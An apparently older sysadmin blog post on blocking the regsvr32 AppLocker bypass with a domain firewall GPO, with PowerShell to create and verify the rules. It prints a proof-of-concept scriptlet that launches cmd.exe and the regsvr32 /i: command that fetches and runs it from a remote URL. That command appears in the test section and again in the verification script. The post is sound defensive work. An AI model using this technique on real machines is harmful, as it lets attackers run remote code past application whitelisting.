GPO to block regsvr32 AppLocker Bypass Vulnerability

This content is 4 years old. Please read this page keeping its age in mind, along with the fact that technology changes fast and the information on this page may be outdated, not best practice, or plain wrong.

A recently discovered method of bypassing AppLocker with regsvr32.exe poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions): regsvr32 is a signed Microsoft binary that lives in the Windows folder AppLocker's default rules allow, and it will fetch a scriptlet from a URL and execute the script inside it. To work around this issue and prevent regsvr32 from reaching remote resources, you can block regsvr32.exe in the Windows Firewall. Be clear about what that covers: it stops the download of a remote scriptlet, not the execution of one that is already on disk. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO, named it Firewall: Block regsvr32, and then edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.


Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard


Choose Program as the type of rule to create and click Next >


Use C:\Windows\System32\regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it. On 64-bit Windows there is a second, 32-bit copy at C:\Windows\SysWOW64\regsvr32.exe that a rule for the System32 path does not cover, so add a matching rule for it (using %SystemRoot%\System32\regsvr32.exe and %SystemRoot%\SysWOW64\regsvr32.exe keeps the paths correct wherever Windows is installed).


Choose Block as the action and click Next >


Apply it to all profiles (Domain, Private, and Public) so the rule still holds when a laptop is off the corporate network.


Give the rule a name and possibly a description.


The block rule is now listed under Inbound Rules.

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.
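The same four rules (inbound and outbound, for both the 64-bit and the 32-bit regsvr32.exe) can be written straight into the GPO from PowerShell instead of clicking through the wizard twice. This is an added example, not part of the original post; it assumes the domain is corp.example.com and that the GPO named "Firewall: Block regsvr32" already exists, and it needs the built-in NetSecurity module plus edit rights on the GPO, run from an elevated PowerShell on a domain-joined admin host.

```powershell
# Added example: create the regsvr32 block rules directly in the GPO.
# Assumed (not from the original post): domain corp.example.com, GPO already created.
$gpoStore = 'corp.example.com\Firewall: Block regsvr32'   # "<domain FQDN>\<GPO name>"

# Both copies of regsvr32 on a 64-bit system. A rule for System32 alone leaves the
# 32-bit binary in SysWOW64 free to reach the network.
$programs = @(
    '%SystemRoot%\System32\regsvr32.exe',
    '%SystemRoot%\SysWOW64\regsvr32.exe'
)

# Open a GPO session so all rules are written back to the GPO in one save.
$session = Open-NetGPO -PolicyStore $gpoStore

foreach ($program in $programs) {
    $arch = if ($program -like '*SysWOW64*') { '32-bit' } else { '64-bit' }
    foreach ($direction in 'Inbound', 'Outbound') {
        New-NetFirewallRule -GPOSession $session `
            -DisplayName "Block regsvr32 ($arch, $direction)" `
            -Description 'Deny regsvr32.exe all network access (mitigation for regsvr32 /i:<URL> scrobj.dll AppLocker bypass).' `
            -Direction $direction `
            -Program $program `
            -Action Block `
            -Profile Any `
            -Enabled True | Out-Null
    }
}

Save-NetGPO -GPOSession $session

# Confirm what now lives in the GPO.
Get-NetFirewallRule -PolicyStore $gpoStore -DisplayName 'Block regsvr32*' |
    Select-Object DisplayName, Direction, Action, Profile, Enabled
```

The rules land in the same place as the ones made with the wizard (Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security), so they can be reviewed and edited in Group Policy Management afterwards, and the GPO still has to be linked as described below.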

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on a system in scope of the GPO to reapply Group Policy immediately, then confirm the rules show up under Windows Firewall with Advanced Security > Inbound Rules and Outbound Rules.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save it to a file yourself and host it over HTTP (it doesn’t have to have the .SCT extension; the name can be anything).

backdoor.sct

<?XML version="1.0"?>
<scriptlet>
<registration
 progid="Empire"
 classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <!-- Test payload: opens cmd.exe so you can see whether the scriptlet was fetched and run -->
 <script language="JScript">
 <![CDATA[

 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

 ]]>
</script>
</registration>
</scriptlet>

Command to run (/s silent, /n skip DllRegisterServer, /u unregister, /i: pass the URL to DllInstall; scrobj.dll is the scriptlet handler that downloads and executes the script):

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).
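A more convincing test than watching for a window is to check which rules are actually in effect on the workstation and to see the firewall drop regsvr32's connection in the Security log. This is an added example, not part of the original post; it assumes the rule display names start with "Block regsvr32" and must be run from an elevated PowerShell on a machine in scope of the GPO.

```powershell
# Added example: verify the GPO-delivered rules on a workstation and catch the drop.
# Assumed (not from the original post): rule names start with "Block regsvr32".

# 1. Reapply policy, then list the effective regsvr32 rules.
#    ActiveStore is the merged result of local rules and every applied GPO.
gpupdate /target:computer /force | Out-Null
$rules = Get-NetFirewallRule -PolicyStore ActiveStore -DisplayName 'Block regsvr32*' -ErrorAction SilentlyContinue
if (-not $rules) {
    Write-Warning 'No regsvr32 block rules are in effect; check the GPO link, security filtering and gpresult /r.'
}
$rules | ForEach-Object {
    $app = $_ | Get-NetFirewallApplicationFilter
    [pscustomobject]@{
        Rule      = $_.DisplayName
        Direction = $_.Direction
        Action    = $_.Action
        Enabled   = $_.Enabled
        Program   = $app.Program
        Source    = $_.PolicyStoreSource   # the GPO name, not PersistentStore, if it came from Group Policy
    }
} | Format-Table -AutoSize

# 2. Windows does not audit blocked connections by default; turn on failure
#    auditing for the Filtering Platform Connection subcategory.
auditpol /set /subcategory:"Filtering Platform Connection" /failure:enable | Out-Null

# 3. Re-run the test command, then look for event 5157
#    ("The Windows Filtering Platform has blocked a connection") raised for regsvr32.exe.
regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll
Start-Sleep -Seconds 2
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5157; StartTime = (Get-Date).AddMinutes(-5) } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'regsvr32\.exe' } |
    Select-Object TimeCreated, @{ n = 'Detail'; e = {
        ($_.Message -split "`n" | Where-Object { $_ -match 'Application Name|Destination Address|Destination Port' }) -join '; '
    } }
```

A 5157 event naming regsvr32.exe with the outbound destination on port 443 is positive proof the rule fired; no rules in ActiveStore, or rules whose Source is PersistentStore rather than the GPO, means the policy never reached the machine.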
